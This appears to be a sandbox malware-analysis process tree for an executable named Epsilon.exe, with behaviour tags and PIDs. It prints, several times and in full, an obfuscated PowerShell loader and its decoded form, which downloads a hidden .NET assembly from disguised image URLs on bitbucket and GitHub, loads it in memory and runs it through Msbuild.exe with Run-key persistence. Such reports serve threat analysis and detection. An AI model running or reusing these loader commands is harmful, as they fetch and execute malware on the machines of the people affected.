$type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.kFcdima/sdaolnwod/rewrweu/terrwqew/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4124
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        6⤵
        
        PID:4432

C:\Users\Admin\Downloads\Epsilon\Epsilon.exe
"C:\Users\Admin\Downloads\Epsilon\Epsilon.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:992
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c 677ebc888e619.vbs
  2⤵
  - Modifies registry class
  PID:3040
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\677ebc888e619.vbs"
    3⤵
    PID:3440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$I$$9$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBT$HU$YgBz$HQ$cgBp$G4$Zw$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$s$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$g$C$$J$B0$GU$e$B0$C$$PQ$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$9$C$$RwBl$HQ$LQBD$G8$bQBw$HI$ZQBz$HM$ZQBk$EI$eQB0$GU$QQBy$HI$YQB5$C$$LQBi$Hk$d$Bl$EE$cgBy$GE$eQ$g$CQ$ZQBu$GM$V$Bl$Hg$d$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B0$Hk$c$Bl$C$$PQ$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C4$RwBl$HQ$V$B5$H$$ZQ$o$Cc$d$Bl$HM$d$Bw$G8$dwBl$HI$cwBo$GU$b$Bs$C4$S$Bv$GE$YQBh$GE$YQBh$HM$Z$Bt$GU$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$Jw$g$HQ$e$B0$C4$awBG$GM$Z$Bp$G0$YQ$v$HM$Z$Bh$G8$b$Bu$Hc$bwBk$C8$cgBl$Hc$cgB3$GU$dQ$v$HQ$ZQBy$HI$dwBx$GU$dw$v$Gc$cgBv$C4$d$Bl$Gs$YwB1$GI$d$Bp$GI$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$TQBz$GI$dQBp$Gw$Z$$n$Cw$I$$n$D$$Jw$p$Ck$fQB9$$==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4660
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.kFcdima/sdaolnwod/rewrweu/terrwqew/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4512
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        6⤵
        
        PID:2848

C:\Users\Admin\Downloads\Epsilon\Epsilon.exe
"C:\Users\Admin\Downloads\Epsilon\Epsilon.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3944
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c 677ebc888e619.vbs
  2⤵
  - Modifies registry class
  PID:3436
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\677ebc888e619.vbs"
    3⤵
    PID:4560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$I$$9$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBT$HU$YgBz$HQ$cgBp$G4$Zw$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$s$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$g$C$$J$B0$GU$e$B0$C$$PQ$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$9$C$$RwBl$HQ$LQBD$G8$bQBw$HI$ZQBz$HM$ZQBk$EI$eQB0$GU$QQBy$HI$YQB5$C$$LQBi$Hk$d$Bl$EE$cgBy$GE$eQ$g$CQ$ZQBu$GM$V$Bl$Hg$d$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B0$Hk$c$Bl$C$$PQ$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C4$RwBl$HQ$V$B5$H$$ZQ$o$Cc$d$Bl$HM$d$Bw$G8$dwBl$HI$cwBo$GU$b$Bs$C4$S$Bv$GE$YQBh$GE$YQBh$HM$Z$Bt$GU$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$Jw$g$HQ$e$B0$C4$awBG$GM$Z$Bp$G0$YQ$v$HM$Z$Bh$G8$b$Bu$Hc$bwBk$C8$cgBl$Hc$cgB3$GU$dQ$v$HQ$ZQBy$HI$dwBx$GU$dw$v$Gc$cgBv$C4$d$Bl$Gs$YwB1$GI$d$Bp$GI$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$TQBz$GI$dQBp$Gw$Z$$n$Cw$I$$n$D$$Jw$p$Ck$fQB9$$==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4644
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.kFcdima/sdaolnwod/rewrweu/terrwqew/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2780
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        6⤵
        
        PID:4220

C:\Users\Admin\Downloads\Epsilon\Epsilon.exe
"C:\Users\Admin\Downloads\Epsilon\Epsilon.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4684
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c 677ebc888e619.vbs
  2⤵
  PID:1952
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\677ebc888e619.vbs"
    3⤵
    PID:908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
